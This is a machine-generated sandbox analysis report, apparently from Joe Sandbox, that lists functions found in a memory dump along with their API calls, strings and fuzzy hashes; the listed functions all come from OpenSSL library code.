Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: atoi$strcmp
String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
API String ID: 4175852868-1596076588
Opcode ID: 1875cd00db0b90e4c0d86032d87d42243ef611fcc8a6360c4d15416524a2f1a6
Instruction ID: f917f945bc20aa59fcc6265a7c8640483ad87cfc2c4200ec2473eea38a5962bc
Opcode Fuzzy Hash: 1875cd00db0b90e4c0d86032d87d42243ef611fcc8a6360c4d15416524a2f1a6
Instruction Fuzzy Hash: 6051E466B0A74F96EA0C9B29B4241B93391BF54B84F449031EF0E03792EE3CE446A741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE23D3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFD3FCEDC88
GetProcAddress.KERNEL32 ref: 00007FFD3FCEDC9D
GetProcessWindowStation.USER32 ref: 00007FFD3FCEDCC7
GetUserObjectInformationW.USER32 ref: 00007FFD3FCEDCEF
GetLastError.KERNEL32 ref: 00007FFD3FCEDCFD
GetUserObjectInformationW.USER32 ref: 00007FFD3FCEDD68
wcsstr.VCRUNTIME140 ref: 00007FFD3FCEDD90

Strings

_OPENSSL_isservice, xrefs: 00007FFD3FCEDC93
Service-0x, xrefs: 00007FFD3FCEDD89

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindowwcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 459917433-1672312481
Opcode ID: 99dd96cfbefb6a8d05671be5233498e0afd2850c6e90bdb4439f43dff31dda30
Instruction ID: 01c9c36949e77aa9f716892d07f4d79c4813134346b0c3654af7555b9abbcb65
Opcode Fuzzy Hash: 99dd96cfbefb6a8d05671be5233498e0afd2850c6e90bdb4439f43dff31dda30
Instruction Fuzzy Hash: 35416221B45B8A56EB589F34E8A026C2390FF547B4B485734EB7D467E4DF2CE544A310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE4B3D Relevance: 15.1, APIs: 3, Strings: 7, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FE135FD
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FE13660
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FE1368F

Strings

critical,, xrefs: 00007FFD3FE135F6
name=, xrefs: 00007FFD3FE13742
/, xrefs: 00007FFD3FE13718
DER:, xrefs: 00007FFD3FE13656
, value=, xrefs: 00007FFD3FE13733
..\s\crypto\x509v3\v3_conf.c, xrefs: 00007FFD3FE13720
ASN1:, xrefs: 00007FFD3FE13685

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strncmp
String ID: , value=$..\s\crypto\x509v3\v3_conf.c$/$ASN1:$DER:$critical,$name=
API String ID: 1114863663-1429737502
Opcode ID: 63a2bdf598e046781e79bdca1e8e452f79dda2babad14bbaf23e734bb40bd00f
Instruction ID: bf517dc88a9efbda046aaf0d69819a9f9843283b73b04ce18f0bbb89e3b6ef2d
Opcode Fuzzy Hash: 63a2bdf598e046781e79bdca1e8e452f79dda2babad14bbaf23e734bb40bd00f
Instruction Fuzzy Hash: 1B410E62B0868A46FB189F22E82077A7B91BF95BD4F484130DF5D27785EE3DE504E701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE41D8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFD3FCAA7AE
WSAGetLastError.WS2_32 ref: 00007FFD3FCAA7B8

Strings

o, xrefs: 00007FFD3FCAA8DF
..\s\crypto\bio\b_sock2.c, xrefs: 00007FFD3FCAA73E, 00007FFD3FCAA7CE, 00007FFD3FCAA7EA, 00007FFD3FCAA853, 00007FFD3FCAA86F, 00007FFD3FCAA8CB, 00007FFD3FCAA8E7

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: ..\s\crypto\bio\b_sock2.c$o
API String ID: 1729277954-1872632005
Opcode ID: 0f88e614ad80d80276f5bfde924b9d136a1d8b3fe912a0182a12cb3aed0b8be6
Instruction ID: 8af275eac809b1609f98ac99f3518542cdcccc83a05cdf351a794ba603581a55
Opcode Fuzzy Hash: 0f88e614ad80d80276f5bfde924b9d136a1d8b3fe912a0182a12cb3aed0b8be6
Instruction Fuzzy Hash: 2B51E276B0858A86E728CF11F8646BE7361FB84744F440235EB5843A89CF3DE549EB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE3779 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 85stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC89E61
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFD3FC89E7C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC89F26

Strings

nombstr, xrefs: 00007FFD3FC89E9F
pkix, xrefs: 00007FFD3FC89EDF
default, xrefs: 00007FFD3FC89F4A
MASK:, xrefs: 00007FFD3FC89E5A
utf8only, xrefs: 00007FFD3FC89F1C

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strcmpstrncmpstrtoul
String ID: MASK:$default$nombstr$pkix$utf8only
API String ID: 1175158921-3483942737
Opcode ID: baecd749d92ef97b8e8199dea3836fa393c467047f516c379157f803b34e24fb
Instruction ID: 3e8dfbe3a8c5ed2253644b5e65896f78c57a35609a78bf1ee7dea1aa85263181
Opcode Fuzzy Hash: baecd749d92ef97b8e8199dea3836fa393c467047f516c379157f803b34e24fb
Instruction Fuzzy Hash: F8312862F1C58982EB598B18F4E03BD7B61FB85B40F444632EB5E43A95EF2CE495D700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE60D2 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

SwitchToFiber.KERNEL32 ref: 00007FFD3FCA3834
CreateFiber.KERNEL32 ref: 00007FFD3FCA38AC
memmove.VCRUNTIME140 ref: 00007FFD3FCA3905
SwitchToFiber.KERNEL32 ref: 00007FFD3FCA3928
DeleteFiber.KERNEL32 ref: 00007FFD3FCA3A0B

Strings

*, xrefs: 00007FFD3FCA376F
..\s\crypto\async\async.c, xrefs: 00007FFD3FCA3751, 00007FFD3FCA3768, 00007FFD3FCA37B0, 00007FFD3FCA38D9, 00007FFD3FCA3940, 00007FFD3FCA39C0, 00007FFD3FCA39F6, 00007FFD3FCA3A17, 00007FFD3FCA3A44

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: Fiber$Switch$CreateDeletememmove
String ID: *$..\s\crypto\async\async.c
API String ID: 81049052-1471988776
Opcode ID: 2f5ad824e6bf03ec43a37a1b8b27058e65426d9aff57d9b8c2c85c972242c1a6
Instruction ID: 9299e31b843539f9a3dd9740268b5bad6ef21aff2a2826c84716586c09decb3b
Opcode Fuzzy Hash: 2f5ad824e6bf03ec43a37a1b8b27058e65426d9aff57d9b8c2c85c972242c1a6
Instruction Fuzzy Hash: 6BA16872B09A4A85EB68DF25F4B02AD63A0EB54B84F444032DF8D477A1EF3EE545E301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FDE21C0 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 190stringCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,00000000,00007FFD3FDE10D2), ref: 00007FFD3FDE2204
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FDE2369

Strings

, failure codes: , xrefs: 00007FFD3FDE246C
unknown code, xrefs: 00007FFD3FDE222D
status code: , xrefs: 00007FFD3FDE2490
..\s\crypto\ts\ts_rsp_verify.c, xrefs: 00007FFD3FDE22AD, 00007FFD3FDE22C7, 00007FFD3FDE2445, 00007FFD3FDE24A2
unspecified, xrefs: 00007FFD3FDE2465
, status text: , xrefs: 00007FFD3FDE247C

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memsetstrncpy
String ID: , failure codes: $, status text: $..\s\crypto\ts\ts_rsp_verify.c$status code: $unknown code$unspecified
API String ID: 388311670-2553778726
Opcode ID: feae45a6368c2e28faf50cd85873c30f26c3c2ceb99fc467786bd928e5e196d1
Instruction ID: ef5f5bff0c51cc62bf5171f0d3afb2dfd126ef922a3ff8d0ac4807dbac08ce2e
Opcode Fuzzy Hash: feae45a6368c2e28faf50cd85873c30f26c3c2ceb99fc467786bd928e5e196d1
Instruction Fuzzy Hash: C781B172F0C68A85EB28EB11B8643B963A1FBA5B84F880135DB4D43795DF3EE405A741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE54C5 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 121stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140 ref: 00007FFD3FDE6A7A
strchr.VCRUNTIME140 ref: 00007FFD3FDE6A8B
memmove.VCRUNTIME140 ref: 00007FFD3FDE6BAD

Strings

..\s\crypto\ui\ui_lib.c, xrefs: 00007FFD3FDE6B14, 00007FFD3FDE6B8D
You must type in , xrefs: 00007FFD3FDE6B4F
characters, xrefs: 00007FFD3FDE6B28
to , xrefs: 00007FFD3FDE6B39

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strchr$memmove
String ID: characters$ to $..\s\crypto\ui\ui_lib.c$You must type in
API String ID: 1080442166-3422546668
Opcode ID: 86ffed5a8e159f5a57d47c60d640ab80ac40658c8a89624c649fd343aea4f7b3
Instruction ID: 21eab4b9e8dec0c91e0d65d22e4229513ac9a43a0ee3c42a44f69a2b0c232ef4
Opcode Fuzzy Hash: 86ffed5a8e159f5a57d47c60d640ab80ac40658c8a89624c649fd343aea4f7b3
Instruction Fuzzy Hash: 07510562B1864A86EB28CF24E46467C3760FBA4B48F084232DB4C077D5DF3DE604E781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE3CFC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 114stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140 ref: 00007FFD3FDD8149
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FDD8164
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FDD817D

Strings

..\s\crypto\store\store_lib.c, xrefs: 00007FFD3FDD81DB, 00007FFD3FDD81F3
T, xrefs: 00007FFD3FDD81FA
file, xrefs: 00007FFD3FDD8111, 00007FFD3FDD8156

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: _stricmpstrchrstrncmp
String ID: ..\s\crypto\store\store_lib.c$T$file
API String ID: 3017659097-909561481
Opcode ID: 39915f56e0ddc46c0cb44c36ae9ccb2b802c5d23dbfdd91a05749117255e1e5e
Instruction ID: 13e4495c36371d97eb0f7f39fb116522f8b82ab91662b54c49216391135b21d4
Opcode Fuzzy Hash: 39915f56e0ddc46c0cb44c36ae9ccb2b802c5d23dbfdd91a05749117255e1e5e
Instruction Fuzzy Hash: E441EF72B09B4A96EA1AAF11E8605A977A4FF98BC4F444030EF4C07765EF3CE509E701

Uniqueness

